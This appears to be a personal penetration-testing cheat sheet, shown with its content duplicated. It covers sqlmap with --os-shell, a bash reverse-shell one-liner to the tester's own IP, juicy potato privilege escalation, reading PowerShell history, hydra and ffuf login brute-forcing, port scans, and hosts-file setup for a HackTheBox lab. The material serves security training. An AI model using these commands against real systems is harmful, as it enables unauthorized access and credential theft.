My Pentest Tools

SQLMap(sql injection tool)

To check if we have an sql injection in a parameter we can capture the request with burp and save to a file, then use sqlmap to test a bunch of querrys and see if we have sql injection.
sqlmap -r request -p search
- -r: is the request file where we have the captured request
- -p: is the parameter that we want to test if is vulnerable
- --os-shell: this will spawn a shell if we can execute commands in the target machine
Then if we have a shell, just: bash -c "bash -i >& /dev/tcp/{your_IP}/1234 0>&1"
Once we get a shell we notice that its not a very interactive shell nor stable, so we can try to use python to create a more reliable shell.

Winpeas(Post-exploitation enumeration tool for windows machines)

If we have the token permission SeImpersonatePrivilege, which is vulnerable to juicy potato, we can maybe escalate privileges.
if we have a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. To do that, we will read the PowerShell history file, which is the equivalent of .bash_history for Linux systems. The file ConsoleHost_history.txt can be located in the directory C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\.

hydra -l <user> -P <pass_wordlist> <target> <method> "<endpoitn>:username=^USER^&password=^PASS^&Login=Login:Login Failed"
- -l: specify the username
- -L: specify a list of usernames
- -P: spcify a list of passwords
- target: target domain or ip
- method: method of the attack(most http-post-form)
- "<Path>:<RequestBody>:<PassList>" : path is the endpoint of the request, request body contains the username and password, and Passlist is a string to check if we get a valid or invalid page.
- To bruteforce the user replace the value with ^USER^
- To bruteforce the pass replace the value with ^PASS^

Fuff(Brute force APIS and Parameters)

Capture the request of a failed login with burp
Replace the password and/or username fields with a identifier such as ^FUZZPASS^
right-click->copy to file

ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200
- -request: indicates the request file we saved
- -request-proto: indicates the protocol to use
- -mode: clusterbomb by default
- -w: indicates the wordlists fo each identifier
- -mc: indicates the http response that we want

Bash tricks

Set the IP of the target machine as a environment variable: export IP=<Ip_here>

Rustscan(Scan Ports)

Scan all ports with default scripts: rustscan --range 1-65535 --scripts default <host>

NMAP(Information about ports)

List the ports with information: nmap -sT -p <port_list> -Pn -sV <host>

Linux Tricks

Hosts

On opening Firefox and putting http://[target ip] , the browser returns a message about being unable to find that site. Looking in the URL bar, it now shows http://unika.htb . The website has redirected the browser to a new URL, and your host doesn't know how to find unika.htb . This webserver is employing name-based Virtual Hosting for serving the requests.
Name-Based Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname. The web server checks the domain name provided in the Host header field of the HTTP request and sends a response according to that.
The /etc/hosts file is used to resolve a hostname into an IP address & thus we will need to add an entry in the /etc/hosts file for this domain to enable the browser to resolve the address for unika.htb .

PreviousVuln notes NextMy Projects

Last updated 2 years ago

SQLMap(sql injection tool)

To check if we have an sql injection in a parameter we can capture the request with burp and save to a file, then use sqlmap to test a bunch of querrys and see if we have sql injection.

sqlmap -r request -p search

-r: is the request file where we have the captured request
-p: is the parameter that we want to test if is vulnerable
--os-shell: this will spawn a shell if we can execute commands in the target machine

Then if we have a shell, just: bash -c "bash -i >& /dev/tcp/{your_IP}/1234 0>&1"

Once we get a shell we notice that its not a very interactive shell nor stable, so we can try to use python to create a more reliable shell.

Winpeas(Post-exploitation enumeration tool for windows machines)

If we have the token permission SeImpersonatePrivilege, which is vulnerable to juicy potato, we can maybe escalate privileges.

if we have a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. To do that, we will read the PowerShell history file, which is the equivalent of .bash_history for Linux systems. The file ConsoleHost_history.txt can be located in the directory C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\.

Hydra(Brute Force Login)

hydra -l <user> -P <pass_wordlist> <target> <method> "<endpoitn>:username=^USER^&password=^PASS^&Login=Login:Login Failed"

-l: specify the username
-L: specify a list of usernames
-P: spcify a list of passwords
target: target domain or ip
method: method of the attack(most http-post-form)
"<Path>:<RequestBody>:<PassList>" : path is the endpoint of the request, request body contains the username and password, and Passlist is a string to check if we get a valid or invalid page.
To bruteforce the user replace the value with ^USER^
To bruteforce the pass replace the value with ^PASS^

Fuff(Brute force APIS and Parameters)

Capture the request of a failed login with burp

Replace the password and/or username fields with a identifier such as ^FUZZPASS^

right-click->copy to file

ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200

-request: indicates the request file we saved
-request-proto: indicates the protocol to use
-mode: clusterbomb by default
-w: indicates the wordlists fo each identifier
-mc: indicates the http response that we want

Linux Tricks

Hosts

On opening Firefox and putting http://[target ip] , the browser returns a message about being unable to find that site. Looking in the URL bar, it now shows http://unika.htb . The website has redirected the browser to a new URL, and your host doesn't know how to find unika.htb . This webserver is employing name-based Virtual Hosting for serving the requests.

Name-Based Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname. The web server checks the domain name provided in the Host header field of the HTTP request and sends a response according to that.

The /etc/hosts file is used to resolve a hostname into an IP address & thus we will need to add an entry in the /etc/hosts file for this domain to enable the browser to resolve the address for unika.htb .